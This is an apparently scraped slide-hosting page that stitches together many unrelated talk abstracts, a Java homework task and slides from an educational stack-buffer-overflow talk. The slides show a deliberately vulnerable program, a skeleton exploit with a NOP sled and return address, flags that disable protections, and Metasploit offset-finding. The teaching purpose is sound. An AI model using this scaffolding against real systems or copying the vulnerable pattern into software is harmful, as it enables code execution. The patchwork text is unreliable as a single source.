This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" inside a vulnerable program through memory manipulation, then walks through developing a stack buffer overflow exploit against a vulnerable C program. Compiler and platform protections such as stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program that automates building the exploit string which triggers the vulnerability and redirects execution.
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through a simple exploit, how it's developed and how it's used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as another programming tool. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it's developed and how it's used. The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Software Vulnerabilities in C and C++ (CppCon 2018) - Patricia Aas
What does a vulnerability using signed integer overflow look like? Or a stack buffer overflow? How does code like this look and how can we change the way we program to reduce our risk? The first half of this talk will show examples of many different vulnerabilities and describe how these are combined to make the first steps of an exploit. Then we will discuss what kind of programming practices we can employ to reduce the chances of these kinds of bugs creeping into our code.
Thoughts On Learning A New Programming Language - Patricia Aas
How should we teach a new language to folks that already know how to program?
How do we use what we already know to leapfrog the learning process?
Based on my personal experience and snippets of natural language theory, we will try to explore the cheats and pitfalls when learning a new programming language, but also dig into how we can make it easier.
The Anatomy of an Exploit (NDC TechTown 2019) - Patricia Aas
Security vulnerabilities and secure coding are often talked about in the abstract by programmers, but rarely understood. In this talk we will walk through simple exploit attempts, and finally a simple stack buffer overflow exploit, how it's developed and how it's used.
The goal is to try to get a feeling for the point of view of an "attacker", and to slowly start looking at exploitation as just another programming practice. We will mainly be looking at C and x86_64 assembly, so bring snacks.
Secure Programming Practices in C++ (NDC Oslo 2018) - Patricia Aas
Bjarne Stroustrup, the creator of C++, once said: "C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off." He has also said: "Within C++, there is a much smaller and cleaner language struggling to get out." Both are true.
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. Motivated by going through well known vulnerability patterns that have been used in exploits for decades, we will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the “smaller and cleaner language” inside C++. And by doing so, we will also build an awareness around code constructs that can potentially “blow your whole leg off”.
Undefined Behavior and Compiler Optimizations can result in programs that display surprising behavior. In this presentation we look at some examples, and I hope to convince you that you should not reason about Undefined Behavior and that you should take care and use your tools.
Secure Programming Practices in C++ (NDC Security 2018) - Patricia Aas
This talk is for programmers wishing to feel more comfortable navigating the C++ landscape. We will explore the programming culture that has developed around the C++ language. Specifically, we will look at programming patterns that navigate around or through some of the dangerous parts of the C++ language. The goal is to build a set of programming practices based in the "smaller and cleaner language" inside C++. And by doing so, we will also build an awareness around code constructs that can potentially "blow your whole leg off".
Chromium Sandbox on Linux (NDC Security 2019) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Learning a new language is often colored by the language you come from.
As a programmer coming from C++ and Java, with some functional programming background, how did I navigate trying to get a grasp of C#? Should be fun for C# developers, but also educational: How do we teach a new language to folks that already know how to program?
Reading Other Peoples Code (Web Rebels 2018) - Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other people's code. Is there a way to methodically read and understand other people's work, build their mental models? In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Isolating GPU Access in its Own Process - Patricia Aas
Chromium's process architecture restricts graphics access to a separate GPU process. There are several reasons why this could make sense; three common ones are Security, Robustness and Dependency Separation.
GPU access restricted to a single process requires an efficient framework for communication over IPC from the other processes, and most likely a framework for composition of surfaces. This talk describes both the possible motivations for this kind of architecture and Chromium's solution for the IPC framework. We will demonstrate how a multi-process program can compose into a single window on Linux.
Exploit Research and Development Megaprimer: Win32 Egghunter - Ajin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Chromium Sandbox on Linux (BlackHoodie 2018) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
Introduction to Memory Exploitation (CppEurope 2021) - Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
Cisco network equipment has always been an attractive attack target due to its prevalence and the key role that it plays in network structure and security.
This equipment is based on a wide variety of OS (firmware) architectures, types, and versions, so it is much harder to develop a universal shellcode. Publicly available Cisco IOS shellcodes are tailored to specific equipment, have narrow functionality, and are not exactly useful for penetration testing.
This talk presents research initiated by our research center to create a shellcode that is as easily portable between different IOS firmwares as possible and that provides many pentesting features, because it can dynamically change the shellcode destination at the post-exploitation stage.
We will also consider the possibility of creating a worm which could spread across the infrastructure, from firewall to router, from router to switch, etc.
Linux Security APIs and the Chromium Sandbox - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Introduction to Memory Exploitation (Meeting C++ 2021) - Patricia Aas
Stack based exploitation has gotten all the fame, but many platform and compiler mitigations have made it very hard to exploit stack vulnerabilities. Heap based exploits are still very relevant, and since this is black magic for most developers I will here give an introduction to the field.
We keep on thinking we are living in the future, but native exploitation has a rich history, and many times the vulnerabilities and exploitation techniques are decades old. We'll look at some of these, how they have surfaced in recent years and how prepared we are today, armed with modern tooling, to find and fix "classic" vulnerabilities.
There is hardly a Senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless of the warnings of removal from future JDK releases? Are there any safe alternatives to the private API, or is it absolutely vital? We will review the typical cases when Java developers prefer to go unsafe and discuss the major benefits and drawbacks of doing so. The talk will be supported by real examples from OK.RU's experience.
The Square Register Android app doesn't crash. Well... almost never!
The magic recipe? Combining an aggressive approach to metadata reporting with precise monitoring. Come and discover the tools and techniques that let us develop an app that handles payments without dying of fright!
http://www.mix-it.fr/session/3532/
Vagrant is a well-known tool for creating development environments in a simple and consistent way. Since we adopted it in our organization we have experienced several benefits: lower project setup times, better shared knowledge among team members, fewer wtf moments ;-)
In this session we'd like to share our experience, including but not limited to:
- advanced Vagrantfile configuration
- VM configuration tips for dev environments: performance, debug, tuning
- our wtf moments
- PuPHPet/Phansible: hot or not?
- packaging a box
seccomp is a computer security facility in the Linux kernel, pledge is a similar security facility in the OpenBSD kernel. In this presentation Giovanni Bechis will review the development story and progress of both kernel interfaces and will analyze the main differences. There will be some examples of implementations of security patches made for some important open source projects.
Return Oriented Programming, an introduction - Patricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of.
In this talk you will learn how it works, and we will go through how it can be used to execute code in contexts where the stack is not executable.
TASK #1 In the domain class you will create a loop that will prompt.pdf - indiaartz
TASK #1
In the domain class you will create a loop that will prompt the user to enter a value of 1, 2, or 3,
which will in turn, be translated to a floor number in the game. Make sure the user only picks a
selection you are expecting (1, 2, or 3) with a while-loop. Then you will create a switch or if-else
statement. If you are more comfortable with if-else then do switch, or if you are more
comfortable with switch then do if-else. Based on the number the user chooses you will set the
floor variable to the appropriate value. When they select 1 floor should be set to 3, when they
select 2 floor should be set to 6, and when they select 3 floor should be set to 10.
TASK #2
In the domain class you will create a constructor with 6 parameters, representing all the data
loaded from the input file that was saved from a previous adventure. This constructor receives 6
parameters: aName, anAttack, aDefense, aHealth, aCurrentFloor, & aMaxFloor.
TASK #3
In the domain class you will create a save method that will allow the user to save their progress
using a PrintWriter object. This file will overwrite whatever was there before, so no need to use
FileWriter, only PrintWriter. There are 6 attributes that you need to write to the file:
name, attack, defense, health, currentFloor, & maxFloor
```java
// Requires java.io.PrintWriter and java.io.FileNotFoundException.
// PrintWriter(String) truncates an existing file, so the previous save is overwritten.
public void saveFile() throws FileNotFoundException
{
    String filename = "game.txt";
    PrintWriter pw = new PrintWriter(filename);
    // One attribute per line, in the order the load method reads them back.
    pw.println(name);
    pw.println(attack);
    pw.println(defense);
    pw.println(health);
    pw.println(currentFloor);
    pw.println(maxFloor);
    pw.close();
}
```
TASK #4
In the driver class you will create a load method that will allow the user to pick up from where
they left off. You will do this using a File object and a Scanner object. Remember to use the File
and Scanner classes, and to close the file object after you’re done. There are 6 attributes you will
need to load from the file to successfully continue an Adventure:
name, attack, defense, health, currentFloor, & maxFloor
After you read the record from the file, and store the data in these 6 variables, you can create a
new Adventure object called JavaQuest with those 6 variables. Remember JavaQuest is a global
variable defined at the beginning of the driver class. Then, within the load method, invoke the
startAdventure() method for the newly created Adventure object.
```java
// Requires java.io.File, java.io.FileNotFoundException and java.util.Scanner.
public static void load() throws FileNotFoundException
{
    String filename = "load.txt";
    File myFile = new File(filename);
    Scanner myScan = new Scanner(myFile);
    String name;
    int attack, defense, health, currentFloor, maxFloor;
    name = myScan.nextLine();
    attack = myScan.nextInt();
    myScan.nextLine(); // consume the line break left behind by nextInt()
    defense = myScan.nextInt();
    myScan.nextLine();
    …
    myScan.close(); // close the file object once all six attributes are read
    javaQuest = new Adventure(name, attack, defense, health, currentFloor, maxFloor);
    javaQuest.startAdventure(); // invoked inside load(), on the newly created object
}
```
The Files
```java
package Adventure;
import java.io.BufferedWriter;
import java.io.File;
import java.io.IOException;
import java.io.PrintWriter;
import java.util.Random;
import java.util.Scanner;
public class Adventure
{
int health, defense, attack;
String mons.
```
Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."
The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control of the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.
Qualys security researchers discovered this bug and worked closely with Linux distribution vendors. As a result, we are releasing this advisory today as a coordinated effort, and patches for all distributions are available as of January 27, 2015.
Dependency Management in C++ (NDC TechTown 2021) - Patricia Aas
C++ has been slow to settle on standardized tools for building and dependency management. In recent years CMake has emerged as the de facto standard for builds, but dependency management still has no clear winner. In this talk I will look into what dependency management might look like in modern C++ projects and how that relates to security.
NDC TechTown 2023_ Return Oriented Programming an introduction.pdf - Patricia Aas
Return Oriented Programming (ROP) is an exploitation technique that folks have often heard of, but don't know the mechanics of. In this talk you will learn how it works, and we will go through some examples to show how it can be used to execute code in contexts where the stack is not executable.
I can't work like this (KDE Academy Keynote 2021) - Patricia Aas
Making software products can be fraught with conflicts, where people in different roles may feel sabotaged by others. In this talk I present a model for thinking about the problems we solve and how we solve them, and using that I hope to convince you that team excellence comes from our differences, rather than in spite of them. Hopefully you'll walk away with a deeper understanding of that colleague that never writes tests, or the one that constantly complains that all you do is "make bugs".
Trying to build an Open Source browser in 2020 - Patricia Aas
A lot of things have been developed over the last 15 years that should make the process of making a browser easier. In this talk we will explore a bunch of different tools, platforms and libraries that could go into making a browser in 2020.
We will also see a live demo of a simple browser built with these OSS projects. We will also discuss the limitations and future work needed to make this work in practice.
DevSecOps for Developers, How To Start (ETC 2020) - Patricia Aas
How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture?
Often the culture clash between Security and Development is even more prominent than between Development and Operations. Understanding the differences in how these functions work, and leveraging their similarities, will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
Elections: Trust and Critical Infrastructure (NDC TechTown 2019) - Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based on the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Elections, Trust and Critical Infrastructure (NDC TechTown) - Patricia Aas
Free and correct elections are the linchpin of democracy. For a government to be formed based on the will of the people, the will of the people must be heard. Across the world election systems are being classified as critical infrastructure, and they face the same concerns as all other fundamental systems in society.
We are building our critical infrastructure from hardware and software built by nations and companies we can’t expect to trust. How can this be dealt with in Election Security, and can those lessons be applied to other critical systems society depends on today?
Survival Tips for Women in Tech (JavaZone 2019) - Patricia Aas
Being the only woman on your team can be hard. Many times it’s difficult to know what is only your experience and what is common. In this talk we’ll go through 24 tips (and a few bonus tips) based on well over a decade of experience being the only woman in several teams. If you’re a woman hopefully you’ll walk out with some ideas you can put to work right away, if you’re a man hopefully you’ll walk out with a new perspective and start noticing things in your day-to-day that you didn’t notice before.
https://patricia.no/2018/09/06/survival_tips_for_women_in_tech.html
More and more we see technology, both hardware and software, intersect with fundamental issues like privacy, democracy and human rights. The opaqueness of tech makes it a handy instrument of oppression and manipulation. We have taught the population to trust us. We have constructed a world in which they have to exist, with little to no oversight or transparency. We build critical infrastructure on hardware and software that even we cannot audit. How can we wield that responsibility? How do we protect those that speak up? How do we protect the population?
Keynote: Deconstructing Privilege (C++ on Sea 2019) - Patricia Aas
Can you describe a situation that caused you to realize you were privileged?
I have asked many people that question now, and what I have learned is that privilege is an Unconscious Incompetence. Being privileged is a non-event. When we become conscious of it we realize that our privileged experience is not applicable to less privileged people. What happens to them does not happen to us. Only when we become Consciously Incompetent do we realize the need to listen. We need to learn.
In this talk I hope to make you realize that we all have privilege and to start a journey through self reflection to becoming Consciously Incompetent. I hope also to give some indicators and patterns that you can look for in your daily lives to recognize and maybe even to correct imbalances you see.
Trying to prepare your project or organisation to be able to receive vulnerability reports is a daunting task. And often far more complex and cross disciplinary than one first expects.
This talk describes some of the most common challenges and how to counteract them.
Why Is Election Security So Hard? (Paranoia 2019) Patricia Aas
What makes the domain and requirements of elections so difficult to solve with computers? In this talk we will go through a lot of the requirements of an election and what motivates them, and show how computers surprisingly often introduce more vulnerabilities than they solve when applied to elections.
Reading Other Peoples Code (NDC Copenhagen 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully, you will walk away with a plan on how to approach a new code base. But even more, I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
How can you squeeze Security into DevOps? Security is often an understaffed function, so how can you leverage what you have in DevOps to improve your security posture? We will reveal processes already in place that can be used to improve security. This fine tuning of tools and processes can give you DevSecOps on a shoestring.
Reading Other Peoples Code (NDC London 2019)Patricia Aas
Someone else's code. Even worse, thousands of lines, maybe hundreds of files of other peoples code. Is there a way to methodically read and understand other peoples work, build their mental models?
In this talk I will go through techniques I have developed throughout 18 years of programming. Hopefully you will walk away with a plan on how to approach a new code base. But even more I hope you walk away with a feeling of curiosity, wanting to get to know your fellow programmers through their code.
Gamify Your Mind; The Secret Sauce to Delivering Success, Continuously Improv...Shahin Sheidaei
Games are powerful teaching tools, fostering hands-on engagement and fun. But they require careful consideration to succeed. Join me to explore factors in running and selecting games, ensuring they serve as effective teaching tools. Learn to maintain focus on learning objectives while playing, and how to measure the ROI of gaming in education. Discover strategies for pitching gaming to leadership. This session offers insights, tips, and examples for coaches, team leads, and enterprise leaders seeking to teach from simple to complex concepts.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
In software engineering, the right architecture is essential for robust, scalable platforms. Wix has undergone a pivotal shift from event sourcing to a CRUD-based model for its microservices. This talk will chart the course of this pivotal journey.
Event sourcing, which records state changes as immutable events, provided robust auditing and "time travel" debugging for Wix Stores' microservices. Despite its benefits, the complexity it introduced in state management slowed development. Wix responded by adopting a simpler, unified CRUD model. This talk will explore the challenges of event sourcing and the advantages of Wix's new "CRUD on steroids" approach, which streamlines API integration and domain event management while preserving data integrity and system resilience.
Participants will gain valuable insights into Wix's strategies for ensuring atomicity in database updates and event production, as well as caching, materialization, and performance optimization techniques within a distributed system.
Join us to discover how Wix has mastered the art of balancing simplicity and extensibility, and learn how the re-adoption of the modest CRUD has turbocharged their development velocity, resilience, and scalability in a high-growth environment.
Accelerate Enterprise Software Engineering with PlatformlessWSO2
Key takeaways:
Challenges of building platforms and the benefits of platformless.
Key principles of platformless, including API-first, cloud-native middleware, platform engineering, and developer experience.
How Choreo enables the platformless experience.
How key concepts like application architecture, domain-driven design, zero trust, and cell-based architecture are inherently a part of Choreo.
Demo of an end-to-end app built and deployed on Choreo.
Quarkus Hidden and Forbidden ExtensionsMax Andersen
Quarkus has a vast extension ecosystem and is known for its subsonic and subatomic feature set. Some of these features are not as well known, and some extensions are less talked about, but that does not make them less interesting - quite the opposite.
Come join this talk to see some tips and tricks for using Quarkus and some of the lesser known features, extensions and development techniques.
Innovating Inference - Remote Triggering of Large Language Models on HPC Clus...Globus
Large Language Models (LLMs) are currently the center of attention in the tech world, particularly for their potential to advance research. In this presentation, we'll explore a straightforward and effective method for quickly initiating inference runs on supercomputers using the vLLM tool with Globus Compute, specifically on the Polaris system at ALCF. We'll begin by briefly discussing the popularity and applications of LLMs in various fields. Following this, we will introduce the vLLM tool, and explain how it integrates with Globus Compute to efficiently manage LLM operations on Polaris. Attendees will learn the practical aspects of setting up and remotely triggering LLMs from local machines, focusing on ease of use and efficiency. This talk is ideal for researchers and practitioners looking to leverage the power of LLMs in their work, offering a clear guide to harnessing supercomputing resources for quick and effective LLM inference.
Enhancing Research Orchestration Capabilities at ORNL.pdfGlobus
Cross-facility research orchestration comes with ever-changing constraints regarding the availability and suitability of various compute and data resources. In short, a flexible data and processing fabric is needed to enable the dynamic redirection of data and compute tasks throughout the lifecycle of an experiment. In this talk, we illustrate how we easily leveraged Globus services to instrument the ACE research testbed at the Oak Ridge Leadership Computing Facility with flexible data and task orchestration capabilities.
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work the team is investigating ways to speedup the time to solution for many different parts of the DIII-D workflow including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
Why React Native as a Strategic Advantage for Startup Innovation.pdfayushiqss
Do you know that React Native is being increasingly adopted by startups as well as big companies in the mobile app development industry? Big names like Facebook, Instagram, and Pinterest have already integrated this robust open-source framework.
In fact, according to a report by Statista, the number of React Native developers has been steadily increasing over the years, reaching an estimated 1.9 million by the end of 2024. This means that the demand for this framework in the job market has been growing making it a valuable skill.
But what makes React Native so popular for mobile application development? It offers excellent cross-platform capabilities among other benefits. This way, with React Native, developers can write code once and run it on both iOS and Android devices thus saving time and resources leading to shorter development cycles hence faster time-to-market for your app.
Let’s take the example of a startup, which wanted to release their app on both iOS and Android at once. Through the use of React Native they managed to create an app and bring it into the market within a very short period. This helped them gain an advantage over their competitors because they had access to a large user base who were able to generate revenue quickly for them.
First Steps with Globus Compute Multi-User EndpointsGlobus
In this presentation we will share our experiences around getting started with the Globus Compute multi-user endpoint. Working with the Pharmacology group at the University of Auckland, we have previously written an application using Globus Compute that can offload computationally expensive steps in the researcher's workflows, which they wish to manage from their familiar Windows environments, onto the NeSI (New Zealand eScience Infrastructure) cluster. Some of the challenges we have encountered were that each researcher had to set up and manage their own single-user globus compute endpoint and that the workloads had varying resource requirements (CPUs, memory and wall time) between different runs. We hope that the multi-user endpoint will help to address these challenges and share an update on our progress here.
OpenFOAM solver for Helmholtz equation, helmholtzFoam / helmholtzBubbleFoamtakuyayamamoto1800
In this slide, we show the simulation example and the way to compile this solver.
In this solver, the Helmholtz equation can be solved by helmholtzFoam. Also, the Helmholtz equation with uniformly dispersed bubbles can be simulated by helmholtzBubbleFoam.
Modern design is crucial in today's digital environment, and this is especially true for SharePoint intranets. The design of these digital hubs is critical to user engagement and productivity enhancement. They are the cornerstone of internal collaboration and interaction within enterprises.
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Anthony Dahanne
Les Buildpacks existent depuis plus de 10 ans ! D’abord, ils étaient utilisés pour détecter et construire une application avant de la déployer sur certains PaaS. Ensuite, nous avons pu créer des images Docker (OCI) avec leur dernière génération, les Cloud Native Buildpacks (CNCF en incubation). Sont-ils une bonne alternative au Dockerfile ? Que sont les buildpacks Paketo ? Quelles communautés les soutiennent et comment ?
Venez le découvrir lors de cette session ignite
Developing Distributed High-performance Computing Capabilities of an Open Sci...Globus
COVID-19 had an unprecedented impact on scientific collaboration. The pandemic and its broad response from the scientific community has forged new relationships among public health practitioners, mathematical modelers, and scientific computing specialists, while revealing critical gaps in exploiting advanced computing systems to support urgent decision making. Informed by our team’s work in applying high-performance computing in support of public health decision makers during the COVID-19 pandemic, we present how Globus technologies are enabling the development of an open science platform for robust epidemic analysis, with the goal of collaborative, secure, distributed, on-demand, and fast time-to-solution analyses to support public health.
top nidhi software solution freedownloadvrstrong314
This presentation emphasizes the importance of data security and legal compliance for Nidhi companies in India. It highlights how online Nidhi software solutions, like Vector Nidhi Software, offer advanced features tailored to these needs. Key aspects include encryption, access controls, and audit trails to ensure data security. The software complies with regulatory guidelines from the MCA and RBI and adheres to Nidhi Rules, 2014. With customizable, user-friendly interfaces and real-time features, these Nidhi software solutions enhance efficiency, support growth, and provide exceptional member services. The presentation concludes with contact information for further inquiries.
Experience our free, in-depth three-part Tendenci Platform Corporate Membership Management workshop series! In Session 1 on May 14th, 2024, we began with an Introduction and Setup, mastering the configuration of your Corporate Membership Module settings to establish membership types, applications, and more. Then, on May 16th, 2024, in Session 2, we focused on binding individual members to a Corporate Membership and Corporate Reps, teaching you how to add individual members and assign Corporate Representatives to manage dues, renewals, and associated members. Finally, on May 28th, 2024, in Session 3, we covered questions and concerns, addressing any queries or issues you may have.
For more Tendenci AMS events, check out www.tendenci.com/events
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTier1 app
Even though at surface level ‘java.lang.OutOfMemoryError’ appears as one single error; underlyingly there are 9 types of OutOfMemoryError. Each type of OutOfMemoryError has different causes, diagnosis approaches and solutions. This session equips you with the knowledge, tools, and techniques needed to troubleshoot and conquer OutOfMemoryError in all its forms, ensuring smoother, more efficient Java applications.
Cyaniclab : Software Development Agency Portfolio.pdfCyanic lab
CyanicLab, an offshore custom software development company based in Sweden,India, Finland, is your go-to partner for startup development and innovative web design solutions. Our expert team specializes in crafting cutting-edge software tailored to meet the unique needs of startups and established enterprises alike. From conceptualization to execution, we offer comprehensive services including web and mobile app development, UI/UX design, and ongoing software maintenance. Ready to elevate your business? Contact CyanicLab today and let us propel your vision to success with our top-notch IT solutions.
11. CWE-242: Use of Inherently Dangerous Function
$ clang -o launch launch.c
launch.c:19:3: warning: implicit declaration of function 'gets' is invalid in C99 [-Wimplicit-function-declaration]
  gets(response);
  ^
1 warning generated.
/tmp/launch-0d1b0f.o: In function `authenticate_and_launch':
launch.c:(.text+0x5e): warning: the `gets' function is dangerous and should not be used.
@pati_gallardo
26. Start from scratch with C++
CMakeLists.txt
# Wargames C++
# -------------------------
add_executable(launch_cpp src/launch.cpp)
48. Shellcode - code that gives you shell
int execve(const char *filename, char *const argv[], char *const envp[]);
Diagram: Target Process running the Vulnerable Program; after the Shellcode runs, the Target Process is running /bin/sh.
51. Write direction vs Stack growing direction
Buffer on the stack, highest address first:
100 char[5]: "ret" address: 95
99 char[4]: No-op
98 char[3]: No-op
97 char[2]: No-op
96 char[1]: Shellcode
95 char[0]: Shellcode
Stack grows toward lower addresses. Instructions also go toward higher addresses.
52. Basic structure of the exploit code
stack_overflow_exploit.c
#include <stdio.h>

int main(void) {
  char shellcode[] = "";
  size_t shellcode_size = (sizeof shellcode) - 1;
  int offset = 0; // We need to find the return addr offset
  int padded_bytes = offset - shellcode_size;
  {
    fwrite(shellcode, 1, shellcode_size, stdout);
  }
  {
    char pad[] = "\x90"; // No-ops
    for (int i = 0; i < padded_bytes; i++)
      fwrite(pad, 1, 1, stdout);
  }
  {
    // We need to find the address of the buffer
    char addr[] = ""; // Little-endian: the 6 low bytes of the address
    fwrite(addr, 1, 6, stdout);
  }
  putchar('\0'); // Trailing null byte
}
53. What we need to know (same stack_overflow_exploit.c as slide 52)
Offset of return address from buffer on the stack
Address of buffer in memory
54. Let's make some changes to make it easier: bigger buffer and get the address
launch_bigger.cpp
#include <cstdio>
#include <cstring>
#include <iostream>

void launch_missiles(int n) {
  printf("Launching %d missiles\n", n);
}
void authenticate_and_launch(void) {
  int n_missiles = 2;
  bool allowaccess = false;
  char response[110];
  printf("%p\n", (void *)&response); // Print the buffer address
  printf("Secret: ");
  std::cin >> response; // Unbounded read into a fixed-size stack buffer
  if (strcmp(response, "Joshua") == 0)
    allowaccess = true;
  if (allowaccess) {
    puts("Access granted");
    launch_missiles(n_missiles);
  }
  if (!allowaccess)
    puts("Access denied");
}
int main(void) {
  puts("WarGames MissileLauncher v0.1");
  authenticate_and_launch();
  puts("Operation complete");
}
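The same read with a bound on it, added here as an example and not code from the slides: the buffer keeps its size, but std::setw caps the extraction at sizeof(response) - 1 characters, so the longer input stays in the stream instead of running over the saved return address. The names read_response, ReadResult and authenticate_from are my own, and the inputs are constructed.

```cpp
#include <cstddef>
#include <cstring>
#include <iomanip>
#include <iostream>
#include <sstream>
#include <string>

// Same fixed-size buffer as launch_bigger.cpp on the slides.
constexpr std::size_t RESPONSE_SIZE = 110;

// The slides read with `std::cin >> response;` and no width: operator>> keeps
// storing characters until whitespace, however long the input is, so a 150-byte
// line runs past the 110-byte buffer and into the saved return address.
// The hardened form sets the width to the array size: at most N - 1 characters
// are stored and the NUL terminator always lands inside the array. Whatever did
// not fit is left unread in the stream rather than written onto the stack.
template <std::size_t N>
std::size_t read_response(std::istream &in, char (&buf)[N]) {
    buf[0] = '\0';  // defined content even if nothing is extracted (e.g. EOF)
    in >> std::setw(static_cast<int>(N)) >> buf;  // width resets after this
    return std::strlen(buf);
}

struct ReadResult {
    std::size_t stored;          // characters that ended up in the buffer
    std::size_t left_in_stream;  // characters that did not fit (still unread)
    bool granted;
};

// The authenticate_and_launch decision, driven from a string so it can be
// checked offline; the comparison against the secret is unchanged.
ReadResult authenticate_from(const std::string &input) {
    std::istringstream in(input);
    char response[RESPONSE_SIZE];
    ReadResult r{};
    r.stored = read_response(in, response);
    r.granted = std::strcmp(response, "Joshua") == 0;
    std::string rest;
    std::getline(in, rest);  // what the bounded read left behind on the line
    r.left_in_stream = rest.size();
    return r;
}

int main() {
    // Constructed inputs: the secret, and a 150-byte line like the
    // pattern_create output used on the later slides.
    ReadResult ok = authenticate_from("Joshua\n");
    ReadResult long_line = authenticate_from(std::string(150, 'A') + "\n");
    std::cout << "secret: stored=" << ok.stored << " granted=" << ok.granted << '\n';
    std::cout << "150-byte line: stored=" << long_line.stored
              << " left=" << long_line.left_in_stream
              << " granted=" << long_line.granted << '\n';
    return 0;
}
```

The bound holds regardless of -fno-stack-protector or -z execstack; those flags only remove mitigations, they do not change what the read stores.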
56. Metasploit pattern_create and pattern_offset
Used to find the offset of the return pointer from the start of the buffer.
Metasploit pattern_create: creates a string of un-repeated character sequences.
Metasploit pattern_offset: gives the offset in the character sequence of this section.
57. Find the offset of the return address
$ pattern_create -l 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
$ clang++ -z execstack -fno-stack-protector -o launch_bigger launch_bigger.cpp
$ gdb -q ./launch_bigger
(gdb) br *authenticate_and_launch+205
Breakpoint 1 at 0x4008dd
(gdb) r
Starting program: ./launch_bigger
WarGames MissileLauncher v0.1
0x7fffffffdc90
Secret:
